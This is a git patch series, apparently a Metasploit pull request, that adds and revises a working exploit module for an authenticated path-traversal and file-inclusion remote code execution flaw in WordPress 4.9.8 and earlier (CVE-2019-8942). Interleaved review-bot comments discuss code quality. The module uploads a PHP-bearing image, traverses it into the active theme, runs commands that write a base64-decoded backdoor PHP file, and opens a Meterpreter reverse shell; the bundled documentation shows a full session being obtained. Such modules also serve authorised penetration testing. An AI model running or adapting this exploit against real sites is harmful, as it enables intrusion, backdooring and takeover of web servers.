z7^>#_B#`XD`+K-l2n>e+ljMot0}nov8tF>EM8>x#j*TPB+Gu{ihpn4ElSkTfJXL9T zN%g!SxO(AKw@yPvpUENKXu#jD7S28*rvP9k)ENBPTgK{xDBio76pFEe&Bs?PYPo5U zec^)*{-5>BNE;j)r7w7oW3$F!uH(Jm%0aG^dglMiu-2KZjx z`graOMSdpf2Ea|}FR_ArE?RneigIT5AO&L9DCfBrsR7mho-s2ZnONFI{?i?+=@6pi zM$QzAW`qeg%==(qsuNTOfd1%C#v%&_M%0{(l9t`8QLUOTxQCkU=j>nTb+Kg(4y{ja zv7My=&Z~wIjC+PEz=9{ z@4aJYo%tA824DnPwk>wxYc5#p;+os2a@*M_8$(ZjJyLR9+^V$6_6y>y;O8l8Mx+K+ z@o!R7564QtZ8=s2hLFHNC6j(`a(uIIK*I`Un2%p$win}#_qKcQrlJC)d6n=;O2GCCpZVRII0-?oE4im)~Q(gH7?G-S-fU5#~d$m6poRR|0KAA@2sZ 
z`sB>R)U?B>meO06`!SfpfV%F$xqnctqmtVi`T@e`~C+VRlUCe literal 0 HcmV?d00001 diff --git a/modules/exploits/unix/webapp/wp_crop_rce.rb b/modules/exploits/unix/webapp/wp_crop_rce.rb new file mode 100644 index 0000000000..7176526413 --- /dev/null +++ b/modules/exploits/unix/webapp/wp_crop_rce.rb 
@@ -0,0 +1,396 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::FileDropper
+ include Msf::Exploit::Remote::HTTP::Wordpress
+
+ def initialize(info = {})
+ super(update_info(
+ info,
+ 'Name' => 'WordPress Crop-image Shell Upload',
+ 'Description' => %q{
+ This module exploit a path traversal and a local file inclusion
+ vulnerability on WordPress versions 4.9.8 and less.
+ The crop-image function allow an user, with at least author privileges,
+ to resize an image an perform a path traversal by changing the _wp_attached_file
+ reference during the upload. The second part of the exploit will include
+ this image in the current theme by changing the _wp_page_template attribute
+ when creating a post.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'RIPSTECH Technology', # Discovery
+ 'Wilfried Becard' # Metasploit module
+ ],
+ 'DisclosureDate' => 'Feb 19 2019',
+ 'Platform' => 'php',
+ 'Arch' => ARCH_PHP,
+ 'Targets' => [['WordPress', {}]],
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
+ OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
+ ])
+ end
+
+ def check
+ cookie = wordpress_login(username, password)
+ if cookie.nil?
+ store_valid_credential(user: username, private: password, proof: cookie)
+ return CheckCode::Safe
+ end
+
+ CheckCode::Appears
+ end
+
+ def username
+ datastore['USERNAME']
+ end
+
+ def password
+ datastore['PASSWORD']
+ end
+
+ def get_wpnonce(cookie)
+ uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'media-new.php')
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => uri,
+ 'cookie' => cookie
+ )
+ if res && res.code == 200 && res.body && res.body.length > 0
+ res.get_hidden_inputs.first["_wpnonce"]
+ end
+ end
+
+ def get_current_theme
+ uri = normalize_uri(datastore['TARGETURI'])
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => uri
+ )
+ if res && res.code == 200 && res.body && res.body.length > 0
+ res.body.scan(/\/wp-content\/themes\/(\w+)\//)[0][0]
+ end
+ end
+
+ def get_ajaxnonce(cookie)
+ uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => uri,
+ 'cookie' => cookie,
+ 'vars_post' => {
+ 'action' => 'query-attachments',
+ 'post_id' => '0',
+ 'query[item]' => '43',
+ 'query[orderby]' => 'date',
+ 'query[order]' => 'DESC',
+ 'query[posts_per_page]' => '40',
+ 'query[paged]' => '1'
+ }
+ )
+ if res && res.code == 200 && res.body && res.body.length > 0
+ res.body.scan(/"edit":"(\w+)"/)[0][0]
+ end
+ end
+
+ def upload_file(tmp_filename, img_name, wp_nonce, cookie)
+ path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2019-8942", tmp_filename)
+ file = File.open(path, "r")
+ img_data = file.read
+ img_name += '.jpg'
+ data = Rex::MIME::Message.new
+ data.add_part(img_name, nil, nil, 'form-data; name="name"')
+ data.add_part('upload-attachment', nil, nil, 'form-data; name="action"')
+ data.add_part(wp_nonce, nil, nil, 'form-data; name="_wpnonce"')
+ data.add_part(img_data, 'image/jpeg', nil, %(form-data; name=\"async-upload\"; filename=\"#{img_name}\"))
+ post_data = data.to_s
+ print_status("Uploading payload")
+ upload_uri =
normalize_uri(datastore['TARGETURI'], 'wp-admin', 'async-upload.php')
+
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => upload_uri,
+ 'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ 'data' => post_data,
+ 'cookie' => cookie
+ )
+ if res && res.code == 200 && res.body && res.body.length > 0
+ print_good("Image uploaded")
+ res = JSON.parse(res.body)
+ image_id = res["data"]["id"]
+ update_nonce = res["data"]["nonces"]["update"]
+ filename = res["data"]["filename"]
+ return filename, image_id, update_nonce
+ end
+ end
+
+
+ def check_library(filename, current_date, cookie)
+ uri = normalize_uri(datastore['TARGETURI'], 'wp-content', 'uploads', current_date, 'cropped-'+filename)
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => uri,
+ 'cookie' => cookie
+ )
+ if res && res.code == 200 && res.body && res.body.length > 0
+ if res.body.include?("gd-jpeg")
+ false
+ end
+ true
+ end
+ end
+
+ def image_editor(img_name, ajax_nonce, image_id, cookie)
+ uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => uri,
+ 'cookie' => cookie,
+ 'vars_post' => {
+ 'action' => 'image-editor',
+ '_ajax_nonce' => ajax_nonce,
+ 'postid' => image_id,
+ 'history' => '[{"c":{"x":0,"y":0,"w":400,"h":300}}]',
+ 'target' => 'all',
+ 'context' => '',
+ 'do' => 'save'
+ }
+ )
+ if res && res.code == 200 && res.body && res.body.length > 0
+ filename = res.body.scan(/(#{img_name}-\S+)-/)[0][0]
+ filename += '.jpg'
+ end
+ end
+
+ def get_wpnonce2(image_id, cookie)
+ uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php?post='+image_id.to_s+'&action=edit')
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => uri,
+ 'cookie' => cookie
+ )
+ if res && res.code == 200 && res.body && res.body.length > 0
+ tmp = res.get_hidden_inputs
+ _wpnonce = tmp[1].first[1]
+ end
+ end
+
+ def change_path(_wpnonce, image_id, filename, current_date, path, cookie)
+ uri =
normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => uri,
+ 'cookie' => cookie,
+ 'vars_post' => {
+ '_wpnonce' => _wpnonce,
+ 'action' => 'editpost',
+ 'post_ID' => image_id,
+ 'meta_input[_wp_attached_file]' => current_date+filename+path
+ }
+ )
+ end
+
+ def crop_image(image_id , ajax_nonce, cookie)
+ uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => uri,
+ 'cookie' => cookie,
+ 'vars_post' => {
+ 'action' => 'crop-image',
+ '_ajax_nonce' => ajax_nonce,
+ 'id' => image_id,
+ 'cropDetails[x1]' => 0,
+ 'cropDetails[y1]' => 0,
+ 'cropDetails[width]' => 400,
+ 'cropDetails[height]' => 300,
+ 'cropDetails[dst_width]' => 400,
+ 'cropDetails[dst_height]' => 300
+ }
+ )
+ end
+
+ def include_theme(shell_name, cookie)
+ uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post-new.php')
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => uri,
+ 'cookie' => cookie
+ )
+ if res && res.code == 200 && res.body && res.body.length > 0
+ _wpnonce = res.body.scan(/name="_wpnonce" value="(\w+)"/)[0][0]
+ post_id = res.body.scan(/"post":{"id":(\w+),/)[0][0]
+ uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => uri,
+ 'cookie' => cookie,
+ 'vars_post' => {
+ '_wpnonce'=>_wpnonce,
+ 'action' => 'editpost',
+ 'post_ID' => post_id,
+ 'post_title' => 'wut',
+ 'post_name' => 'wut',
+ 'meta_input[_wp_page_template]' => "cropped-#{shell_name}.jpg"
+ }
+ )
+ if res && res.code == 302
+ post_id
+ end
+ end
+ end
+
+ def exploit
+ fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
+
+ print_status("Authenticating with WordPress using #{username}:#{password}...")
+ cookie = wordpress_login(username, password)
+ fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
+ print_good("Authenticated with WordPress")
+ store_valid_credential(user: username, private: password, proof: cookie)
+
+ print_status("Preparing payload...")
+ img_name = Rex::Text.rand_text_alpha(10)
+ @current_theme = get_current_theme
+ wp_nonce = get_wpnonce(cookie)
+
+ print_status("Checking crop library")
+ tmp_filename = "evil.jpg"
+ @filename1, image_id, update_nonce = upload_file(tmp_filename, img_name, wp_nonce, cookie)
+ ajax_nonce = get_ajaxnonce(cookie)
+ @current_date = Time.now.strftime("%Y/%m/")
+ #Check current library
+ use_imagick = true
+ crop_image(image_id, ajax_nonce, cookie)
+ use_imagick = check_library(@filename1, @current_date, cookie)
+
+ if use_imagick
+ #IMAGICK exploit
+ img_name = Rex::Text.rand_text_alpha(10)
+ @filename2, image_id, update_nonce = upload_file(tmp_filename, img_name, wp_nonce, cookie)
+ ajax_nonce = get_ajaxnonce(cookie)
+ @filename2 = image_editor(img_name, ajax_nonce, image_id, cookie)
+
+ _wpnonce = get_wpnonce2(image_id, cookie)
+ change_path(_wpnonce, image_id, @filename2, @current_date, '?/x', cookie)
+ crop_image(image_id , ajax_nonce, cookie)
+ @shell_name = Rex::Text.rand_text_alpha(10)
+ change_path(_wpnonce, image_id, @filename2, @current_date, "?/../../../../themes/#{@current_theme}/#{@shell_name}", cookie)
+ crop_image(image_id , ajax_nonce, cookie)
+ print_status("Including into theme")
+ post_id = include_theme(@shell_name, cookie)
+ uri = normalize_uri(datastore['TARGETURI'])
+ #Test if base64 is on target
+ test_string = 'YmFzZTY0c3BvdHRlZAo='
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => uri,
+ 'cookie' => cookie,
+ 'vars_get' => {
+ 'p' => "#{post_id}",
+ '0' => "echo #{test_string} | base64 -d"
+ }
+ )
+ if res && res.code == 200 && res.body && res.body.length > 0
+ if res.body.include?("base64spotted")
+ #Execute payload with base64 decode
+ @backdoor = Rex::Text.rand_text_alpha(10)
+ encoded = Rex::Text.encode_base64(payload.encoded)
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => uri,
+ 'cookie' => cookie,
+ 'vars_get' => {
+ 'p' => "#{post_id}",
+ '0' => "echo #{encoded} | base64 -d > #{@backdoor}.php"
+ }
+ )
+ if res && res.code == 200 && res.body && res.body.length > 0
+ uri = normalize_uri(datastore['TARGETURI'], "#{@backdoor}.php")
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => uri,
+ 'cookie' => cookie
+ )
+ end
+ else
+ print_status("Can't find base64 decode on target.")
+ end
+ end
+ else
+ #GD stuff
+ print_status('GD library')
+ tmp_filename = "evilshell.jpg"
+ img_name = Rex::Text.rand_text_alpha(10)
+ @filename2, image_id, update_nonce = upload_file(tmp_filename, img_name, wp_nonce, cookie)
+ ajax_nonce = get_ajaxnonce(cookie)
+ _wpnonce = get_wpnonce2(image_id, cookie)
+ @shell_name = Rex::Text.rand_text_alpha(10)
+ change_path(_wpnonce, image_id, @filename2, @current_date, "?/../../../../themes/#{@current_theme}/#{@shell_name}", cookie)
+ crop_image(image_id , ajax_nonce, cookie)
+ print_status("Including into theme")
+ post_id = include_theme(@shell_name, cookie)
+ uri = normalize_uri(datastore['TARGETURI'])
+ #Test if base64 is on target
+ test_string = 'YmFzZTY0c3BvdHRlZAo='
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => uri,
+ 'cookie' => cookie,
+ 'vars_get' => {
+ 'p' => "#{post_id}",
+ '0' => "echo #{test_string} | base64 -d"
+ }
+ )
+ if res && res.code == 200 && res.body && res.body.length > 0
+ if res.body.include?("base64spotted")
+ #Execute payload with base64 decode
+ @backdoor = Rex::Text.rand_text_alpha(10)
+ encoded = Rex::Text.encode_base64(payload.encoded)
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => uri,
+ 'cookie' => cookie,
+ 'vars_get' => {
+ 'p' => "#{post_id}",
+ '0' => "echo #{encoded} | base64 -d > #{@backdoor}.php"
+ }
+ )
+ if res && res.code == 200 && res.body && res.body.length > 0
+ uri = normalize_uri(datastore['TARGETURI'], "#{@backdoor}.php")
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => uri,
+ 'cookie' => cookie
+ )
+ end
+ else
+
print_status("Can't find base64 decode on target.") + end + end + end + end + + def on_new_session(client) + #sleep 1 + client.shell_command_token("rm wp-content/uploads/#{@current_date}#{@filename1[0...10]}*") + client.shell_command_token("rm wp-content/uploads/#{@current_date}cropped-#{@filename1[0...10]}*") + client.shell_command_token("rm -r wp-content/uploads/#{@current_date}#{@filename2[0...10]}*") + client.shell_command_token("rm wp-content/themes/#{@current_theme}/cropped-#{@shell_name}.jpg") + #client.shell_command_token("rm #{@backdoor}.php") + end + +end From b168312db168eb6105f60e2c28236ccf595b111c Mon Sep 17 00:00:00 2001 From: wilfried Date: Tue, 19 Mar 2019 17:51:59 +0100 Subject: [PATCH 02/16] Add exploit module for Wordpress core <=4.9.8 (CVE-2019-8942) --- modules/exploits/unix/webapp/wp_crop_rce.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/unix/webapp/wp_crop_rce.rb b/modules/exploits/unix/webapp/wp_crop_rce.rb index 7176526413..12ff6ab9eb 100644 --- a/modules/exploits/unix/webapp/wp_crop_rce.rb +++ b/modules/exploits/unix/webapp/wp_crop_rce.rb @@ -115,7 +115,7 @@ class MetasploitModule < Msf::Exploit::Remote data.add_part(img_name, nil, nil, 'form-data; name="name"') data.add_part('upload-attachment', nil, nil, 'form-data; name="action"') data.add_part(wp_nonce, nil, nil, 'form-data; name="_wpnonce"') - data.add_part(img_data, 'image/jpeg', nil, %(form-data; name=\"async-upload\"; filename=\"#{img_name}\")) + data.add_part(img_data, 'image/jpeg', nil, "form-data; name=\"async-upload\"; filename=\"#{img_name}\"") post_data = data.to_s print_status("Uploading payload") upload_uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'async-upload.php') 
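Review bot: In `check` of the new `wp_crop_rce.rb` (the `@@ -0,0 +1,396 @@` hunk of PATCH 01), `store_valid_credential` sits inside the `if cookie.nil?` branch, so a rejected login is recorded as a valid credential with a nil proof. The same branch returns `CheckCode::Safe`, although a failed login says nothing about whether the WordPress version is affected. The branch should read `return CheckCode::Unknown if cookie.nil?`, with `store_valid_credential(user: username, private: password, proof: cookie)` moved below it. Separately, `exploit` writes `#{username}:#{password}` into its status line, which puts the cleartext password into console output and any saved session log; `print_status("Authenticating with WordPress using #{username}...")` is sufficient.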
@@ -124,7 +124,8 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'POST', 'uri' => upload_uri, 'ctype' => "multipart/form-data; boundary=#{data.bound}", - 'data' => post_data, + 'data' => post_data, #FIXME: during upload process image isn't uploaded as intended (binary has changed). + # In case of GD library the image structure is destroyed resulting into an impossibility to crop. 'cookie' => cookie ) if res && res.code == 200 && res.body && res.body.length > 0 From 794134735e133bc7ca45ca4a8762729510e48ce5 Mon Sep 17 00:00:00 2001 From: Shelby Pace <40177151+space-r7@users.noreply.github.com> Date: Tue, 19 Mar 2019 20:36:13 +0100 Subject: [PATCH 03/16] Update modules/exploits/unix/webapp/wp_crop_rce.rb Co-Authored-By: tiyeuse <39072217+tiyeuse@users.noreply.github.com> --- modules/exploits/unix/webapp/wp_crop_rce.rb | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/modules/exploits/unix/webapp/wp_crop_rce.rb b/modules/exploits/unix/webapp/wp_crop_rce.rb index 12ff6ab9eb..743de28234 100644 --- a/modules/exploits/unix/webapp/wp_crop_rce.rb +++ b/modules/exploits/unix/webapp/wp_crop_rce.rb @@ -30,6 +30,12 @@ class MetasploitModule < Msf::Exploit::Remote 'RIPSTECH Technology', # Discovery 'Wilfried Becard' # Metasploit module ], + 'References' => + [ + [ 'CVE', '2019-8942' ], + [ 'CVE', '2019-8943' ], + [ 'URL', 'https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/'] + ], 'DisclosureDate' => 'Feb 19 2019', 'Platform' => 'php', 'Arch' => ARCH_PHP, From 8853d6d5b5364988a3187f9e31c02821110ed4df Mon Sep 17 00:00:00 2001 
From: wilfried Date: Fri, 22 Mar 2019 17:37:04 +0100 Subject: [PATCH 04/16] Adding documentation + cleaning files from the exploit --- .../modules/exploit/multi/http/wp_crop_rce.md | 58 +++ .../webapp => multi/http}/wp_crop_rce.rb | 336 +++++++++--------- 2 files changed, 232 insertions(+), 162 deletions(-) create mode 100644 documentation/modules/exploit/multi/http/wp_crop_rce.md rename modules/exploits/{unix/webapp => multi/http}/wp_crop_rce.rb (57%) diff --git a/documentation/modules/exploit/multi/http/wp_crop_rce.md b/documentation/modules/exploit/multi/http/wp_crop_rce.md new file mode 100644 index 0000000000..2eec8e1a26 --- /dev/null +++ b/documentation/modules/exploit/multi/http/wp_crop_rce.md 
@@ -0,0 +1,58 @@
+On WordPress versions 5.0.0 and <= 4.9.8 it is possible to gain arbitrary code execution via a core vulnerability combining a Path Traversal and a Local File Inclusion.
+An attacker who gains access to an account with at least author privileges on the target can execute PHP code on the remote server.
+
+## Exploitation Steps
+
+1. Upload an image containing PHP code
+2. Edit the `_wp_attached_file` entry from `meta_input` $_POST array to specify an arbitrary path
+3. Perform the Path Traversal by using the `crop-image` Wordpress function
+4. Perform the Local File Inclusion by creating a new WordPress post and set `_wp_page_template` value to the cropped image. The post will `include()` our image containing PHP code.
+
+When visiting the post created by the attacker it is possible to obtain code execudion.
+
+More details can be found on [RIPS Technology Blog](https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/).
+
+## Verification Steps
+
+Confirm that functionality works:
+1. Start `msfconsole`
+2. `use exploit/unix/webapp/wp_crop_rce`
+3. Set the `RHOST`
+4. Set `USERNAME` and `PASSWORD`
+4. Set `LHOST` and `LPORT`
+5. Run the exploit: `run`
+6. Confirm you have now a meterpreter session
+
+
+## Scenarios
+
+### Ubuntu 18.04 running WordPress 4.9.8
+
+```
+msf5 > use exploit/unix/webapp/wp_crop_rce
+msf5 exploit(unix/webapp/wp_crop_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(unix/webapp/wp_crop_rce) > set username author
+username => author
+msf5 exploit(unix/webapp/wp_crop_rce) > set password author
+password => author
+msf5 exploit(unix/webapp/wp_crop_rce) > run
+
+[*] Started reverse TCP handler on 127.0.0.1:4444
+[*] Authenticating with WordPress using author:author...
+[+] Authenticated with WordPress
+[*] Preparing payload...
+[*] Checking crop library +[*] Uploading payload +[+] Image uploaded +[*] Uploading payload +[+] Image uploaded +[*] Including into theme +[*] Sending stage (38247 bytes) to 127.0.0.1 +[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36568) at 2019-03-19 11:33:27 -0400 + +meterpreter > sysinfo +Computer : ubuntu +OS : Linux ubuntu 4.15.0-46-generic #49-Ubuntu SMP Wed Feb 6 09:33:07 UTC 2019 x86_64 +Meterpreter : php/linux +``` diff --git a/modules/exploits/unix/webapp/wp_crop_rce.rb b/modules/exploits/multi/http/wp_crop_rce.rb similarity index 57% rename from modules/exploits/unix/webapp/wp_crop_rce.rb rename to modules/exploits/multi/http/wp_crop_rce.rb index 743de28234..6405942862 100644 --- a/modules/exploits/unix/webapp/wp_crop_rce.rb +++ b/modules/exploits/multi/http/wp_crop_rce.rb @@ -27,8 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'RIPSTECH Technology', # Discovery - 'Wilfried Becard' # Metasploit module + 'RIPSTECH Technology', # Discovery + 'Wilfried Becard ' # Metasploit module ], 'References' => [ @@ -80,6 +80,23 @@ class MetasploitModule < Msf::Exploit::Remote end end + def get_wpnonce2(image_id, cookie) + uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php') + res = send_request_cgi( + 'method' => 'GET', + 'uri' => uri, + 'cookie' => cookie, + 'vars_get' => { + 'post' => "#{image_id}", + 'action' => "edit" + } + ) + if res && res.code == 200 && res.body && res.body.length > 0 + tmp = res.get_hidden_inputs + wpnonce2 = tmp[1].first[1] + end + end + def get_current_theme uri = normalize_uri(datastore['TARGETURI']) res = send_request_cgi( @@ -87,7 +104,7 @@ class MetasploitModule < Msf::Exploit::Remote 'uri' => uri ) if res && res.code == 200 && res.body && res.body.length > 0 - res.body.scan(/\/wp-content\/themes\/(\w+)\//)[0][0] + res.body.scan(/\/wp-content\/themes\/(\w+)\//).flatten.first end end 
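Review bot: The re-added `get_wpnonce2` (hunk `@@ -80,6 +80,23 @@`) still selects the nonce by position with `tmp[1].first[1]`, so when the edit page returns fewer than two entries from `get_hidden_inputs` the run aborts with NoMethodError on nil instead of a clear failure, after the image has already been uploaded to the tested site. Looking the field up by name, as `get_wpnonce` in this file does with `first["_wpnonce"]`, makes the intent explicit: `form = res.get_hidden_inputs.find { |f| f.key?('_wpnonce') }` followed by `form && form['_wpnonce']`. The local `wpnonce2 =` is assigned and never read, so the assignment can go. A one-line comment stating that this is the edit-post nonce, as opposed to the media-upload nonce from `get_wpnonce`, would explain why two helpers exist.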
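Review bot: Switching to `.scan(...).flatten.first` in `get_current_theme` (hunk `@@ -87,7 +104,7 @@`) turns a missing match into a silent `nil` that no caller checks. `exploit` then interpolates `@current_theme` into the theme path passed to `change_path`, and `on_new_session` into an `rm` command, so an unparsed front page yields a path with an empty theme segment rather than an error. A guard right after the assignment, `fail_with(Failure::UnexpectedReply, 'Could not determine the active theme') unless @current_theme`, stops before anything is written to the site. The same pattern recurs in the later hunks for `get_ajaxnonce`, `image_editor` (where the unchanged `filename += '.jpg'` still raises on `nil`) and `include_theme`.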
@@ -108,30 +125,38 @@ class MetasploitModule < Msf::Exploit::Remote } ) if res && res.code == 200 && res.body && res.body.length > 0 - res.body.scan(/"edit":"(\w+)"/)[0][0] + res.body.scan(/"edit":"(\w+)"/).flatten.first end end def upload_file(tmp_filename, img_name, wp_nonce, cookie) path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2019-8942", tmp_filename) - file = File.open(path, "r") - img_data = file.read + img_data = File.read(path) img_name += '.jpg' - data = Rex::MIME::Message.new - data.add_part(img_name, nil, nil, 'form-data; name="name"') - data.add_part('upload-attachment', nil, nil, 'form-data; name="action"') - data.add_part(wp_nonce, nil, nil, 'form-data; name="_wpnonce"') - data.add_part(img_data, 'image/jpeg', nil, "form-data; name=\"async-upload\"; filename=\"#{img_name}\"") - post_data = data.to_s + + boundary = "#{rand_text_alphanumeric(rand(10) + 5)}" + post_data = "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"name\"\r\n" + post_data << "\r\n#{img_name}\r\n" + post_data << "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"action\"\r\n" + post_data << "\r\nupload-attachment\r\n" + post_data << "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"_wpnonce\"\r\n" + post_data << "\r\n#{wp_nonce}\r\n" + post_data << "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"async-upload\"; filename=\"#{img_name}\"\r\n" + post_data << "Content-Type: image/jpeg\r\n" + post_data << "\r\n#{img_data}\r\n" + post_data << "--#{boundary}--\r\n" print_status("Uploading payload") upload_uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'async-upload.php') res = send_request_cgi( 'method' => 'POST', 'uri' => upload_uri, - 'ctype' => "multipart/form-data; boundary=#{data.bound}", - 'data' => post_data, #FIXME: during upload process image isn't uploaded as intended (binary has changed). 
- # In case of GD library the image structure is destroyed resulting into an impossibility to crop. + 'ctype' => "multipart/form-data; boundary=#{boundary}", + 'data' => post_data, 'cookie' => cookie ) if res && res.code == 200 && res.body && res.body.length > 0 @@ -144,22 +169,6 @@ class MetasploitModule < Msf::Exploit::Remote end end - - def check_library(filename, current_date, cookie) - uri = normalize_uri(datastore['TARGETURI'], 'wp-content', 'uploads', current_date, 'cropped-'+filename) - res = send_request_cgi( - 'method' => 'GET', - 'uri' => uri, - 'cookie' => cookie - ) - if res && res.code == 200 && res.body && res.body.length > 0 - if res.body.include?("gd-jpeg") - false - end - true - end - end - def image_editor(img_name, ajax_nonce, image_id, cookie) uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php') res = send_request_cgi( 
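Review bot: `img_data = File.read(path)` in `upload_file` (hunk `@@ -108,30 +125,38 @@`) reads a JPEG in text mode; for binary data the usual form is `img_data = File.binread(path)`, which avoids newline translation and encoding tagging on platforms where those differ. The hunk also drops the FIXME about the image bytes changing during upload and replaces `Rex::MIME::Message` with a hand-built body without saying why, so a comment above `boundary =` recording that the body is assembled by hand to keep the image bytes unmodified (if that is the reason) would stop a later cleanup from reverting it. The interpolation in `boundary = "#{rand_text_alphanumeric(rand(10) + 5)}"` is redundant, since the call already returns a string. The tail of `upload_file` lies outside this hunk.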
@@ -177,35 +186,22 @@ class MetasploitModule < Msf::Exploit::Remote } ) if res && res.code == 200 && res.body && res.body.length > 0 - filename = res.body.scan(/(#{img_name}-\S+)-/)[0][0] + filename = res.body.scan(/(#{img_name}-\S+)-/).flatten.first filename += '.jpg' end end - def get_wpnonce2(image_id, cookie) - uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php?post='+image_id.to_s+'&action=edit') - res = send_request_cgi( - 'method' => 'GET', - 'uri' => uri, - 'cookie' => cookie - ) - if res && res.code == 200 && res.body && res.body.length > 0 - tmp = res.get_hidden_inputs - _wpnonce = tmp[1].first[1] - end - end - - def change_path(_wpnonce, image_id, filename, current_date, path, cookie) + def change_path(wpnonce2, image_id, filename, current_date, path, cookie) uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php') res = send_request_cgi( 'method' => 'POST', 'uri' => uri, 'cookie' => cookie, 'vars_post' => { - '_wpnonce' => _wpnonce, + '_wpnonce' => wpnonce2, 'action' => 'editpost', 'post_ID' => image_id, - 'meta_input[_wp_attached_file]' => current_date+filename+path + 'meta_input[_wp_attached_file]' => "#{current_date}#{filename}#{path}" } ) end 
@@ -238,19 +234,20 @@ class MetasploitModule < Msf::Exploit::Remote 'cookie' => cookie ) if res && res.code == 200 && res.body && res.body.length > 0 - _wpnonce = res.body.scan(/name="_wpnonce" value="(\w+)"/)[0][0] - post_id = res.body.scan(/"post":{"id":(\w+),/)[0][0] + wpnonce2 = res.body.scan(/name="_wpnonce" value="(\w+)"/).flatten.first + post_id = res.body.scan(/"post":{"id":(\w+),/).flatten.first + post_title = Rex::Text.rand_text_alpha(10) uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php') res = send_request_cgi( 'method' => 'POST', 'uri' => uri, 'cookie' => cookie, 'vars_post' => { - '_wpnonce'=>_wpnonce, + '_wpnonce'=> wpnonce2, 'action' => 'editpost', 'post_ID' => post_id, - 'post_title' => 'wut', - 'post_name' => 'wut', + 'post_title' => post_title, + 'post_name' => post_title, 'meta_input[_wp_page_template]' => "cropped-#{shell_name}.jpg" } ) 
@@ -260,6 +257,81 @@ class MetasploitModule < Msf::Exploit::Remote end end + def wp_cleanup(shell_name, post_id, cookie) + uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php') + res = send_request_cgi( + 'method' => 'POST', + 'uri' => uri, + 'cookie' => cookie, + 'vars_post' => { + 'action' => "query-attachments" + } + ) + if res && res.code == 200 && res.body && res.body.length > 0 + infos = res.body.scan(/id":(\d+),.*filename":"cropped-#{shell_name}".*?"delete":"(\w+)".*"id":(\d+),.*filename":"cropped-x".*?"delete":"(\w+)".*"id":(\d+),.*filename":"#{shell_name}".*?"delete":"(\w+)"/).flatten + id1, id2, id3 = infos[0], infos[2], infos[4] + delete_nonce1, delete_nonce2, delete_nonce3 = infos[1], infos[3], infos[5] + for i in (0...6).step(2) + res = send_request_cgi( + 'method' => 'POST', + 'uri' => uri, + 'cookie' => cookie, + 'vars_post' => { + 'action' => "delete-post", + 'id' => "#{infos[i]}", + '_wpnonce' => "#{infos[i+1]}" + } + ) + end + end + + uri1 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'edit.php') + res = send_request_cgi( + 'method' => 'GET', + 'uri' => uri1, + 'cookie' => cookie + ) + if res && res.code == 200 && res.body && res.body.length > 0 + post_nonce = res.body.scan(/post=#{post_id}&action=trash&_wpnonce=(\w+)/).flatten.first + uri2 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php') + res = send_request_cgi( + 'method' => 'GET', + 'uri' => uri2, + 'cookie' => cookie, + 'vars_get' => { + 'post' => "#{post_id}", + 'action' => 'trash', + '_wpnonce' => "#{post_nonce}" + } + ) + if res && 